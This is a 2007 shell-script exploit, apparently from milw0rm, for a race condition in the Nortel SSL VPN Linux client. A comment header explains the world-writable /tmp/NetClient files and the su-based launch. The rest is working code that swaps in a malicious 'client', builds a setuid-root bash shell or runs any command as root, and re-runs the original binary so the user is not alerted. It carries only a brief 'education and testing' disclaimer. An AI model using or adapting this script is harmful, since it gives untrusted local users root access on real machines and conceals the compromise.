#!/bin/sh
#
# Nortel SSL VPN Linux Client race condition
#
# Jon Hart <jhart@spoofed.org>
#
# The Linux client that is utilized by versions priot to 6.05 of the Nortel
# SSL VPN appliance suffers from a number of problems that, in combination,
# allow an unprivileged local user to obtain root privileges.
#
# This particular bug is as follows:
# 1) SSL VPN is initiated from the startNetdirect() javascript call
# 2) A zip archive is downloaded to the local machine which contains three
# binaries necessary for the client: askpass, client, and surun. This
# archive is written to /tmp, chmod'd 777, and then it is extracted into
# /tmp/NetClient
# 3) All of these files are chmod'd world writable by the following java
# snippet, which is called on all UNIX client OSs:
#
# protected boolean setPermissions(String file)
# {
# String command = "chmod a+xw " + file;
# try
# {
# Process p = Runtime.getRuntime().exec(command);
# p.waitFor();
# }
# ...
# }
#
# 4) /tmp/NetClient/surun is executed, which in turn runs
# /tmp/NetClient/askpass. This process aquires the root password, and
# then executes /tmp/NetClient/client via /bin/su and the root password.
#
# There is clearly a bug in step 2 and 3 whereby files are installed world
# writable. The bug I chose to exploit is the race condition in step 4,
# combined with the insecure permissions of steps 2 and 3, which (IMO),
# gives root more easily. The risk here is if you have untrusted accounts
# on the machine from which you access the Nortel VPN, those accounts can
# easily gain local root access.
#
# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear,
# swap it for our "special version", and wait for a shell.
#
# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,
# but not the vulnerability. The same vulnerability also exists in the Mac
# client.
#
# For education and testing purposes only. Only run this on systems that
# you maintain/control.
#
cleanup() {
rm -f $TMP_DIR/.*-$$\..*
}
run_cmd() {
CMD=$@
VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`
echo "Waiting for writable client"
while (true); do
if [ -w $CLIENT ]; then
OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`
echo "Saving old client"
cp $CLIENT $OLD_CLIENT
chmod 755 $OLD_CLIENT
echo "Writing new \"client\""
echo "#!/bin/sh" > $CLIENT
echo "$CMD" >> $CLIENT
echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT
# ensure the original client gets run so as to
# not alert the user
echo "exec $OLD_CLIENT \$@" >> $CLIENT
break
fi
done
SUCCESS=0
echo "Waiting for new client to be run"
while (true); do
if [ ! -f $VPN_CLIENT_RUN ]; then
SUCCESS=1
break
else
sleep 2
fi
done
if [ $SUCCESS == 1 ]; then
echo "Success"
return 0
else
echo "Exploit failed!"
cleanup
exit 1
fi
}
suid_shell() {
SH_C="sh_c-$$.c"
# write out setuid shell
cat >> $SH_C << EOF
#include <sys/types.h>
#include <unistd.h>
int main (int argc, char **argv) {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
}
EOF
# try like hell to get this shell compiled
SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`
gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1
if [ $? != 0 ]; then
cc -o $SH $SH_C 2>&1 > /dev/null 2>&1
if [ $? != 0 ]; then
echo "Compilation of shell failed"
echo "Trying backup method..."
run_cmd "cp /bin/sh $SH && chmod 4755 $SH"
while (true); do
if [ -u $SH ]; then
$SH
cleanup
exit
else
sleep 1
fi
done
echo "Failed"
cleanup
exit 1
fi
fi
rm -f $SH_C
run_cmd "chown root:root $SH && chmod 4755 $SH"
# wait for our shell to be chmod'd
SUCCESS=0
echo "Waiting for suid shell"
for sleep in `seq 1 60`; do
if [ -u $SH ]; then
echo "Success! setuid shell is $SH"
SUCCESS=1
break
else
sleep 2
fi
done
if [ $SUCCESS == 1 ]; then
cleanup
$SH
else
rm -f $SH
echo "Exploit failed!"
cleanup
exit 1
fi
}
CLIENT="/tmp/NetClient/client"
if [ -f $CLIENT ]; then
echo "client $CLIENT already exists -- forcing stop"
$CLIENT --stop
for sleep in `seq 1 60`; do
if [ ! -f $CLIENT ]; then
break
fi
sleep 1
done
fi
# hack to figure out where temp files get put...
TMP_FILE=`mktemp -t $$`
TMP_DIR=`dirname $TMP_FILE`
rm -f $TMP_FILE
trap cleanup 1 2 3 15
# two modes of operation -- get a root shell, or run a cmd as root.
if [ -z "$1" ]; then
suid_shell
else
run_cmd $1
fi
cleanup
# milw0rm.com [2007-02-21]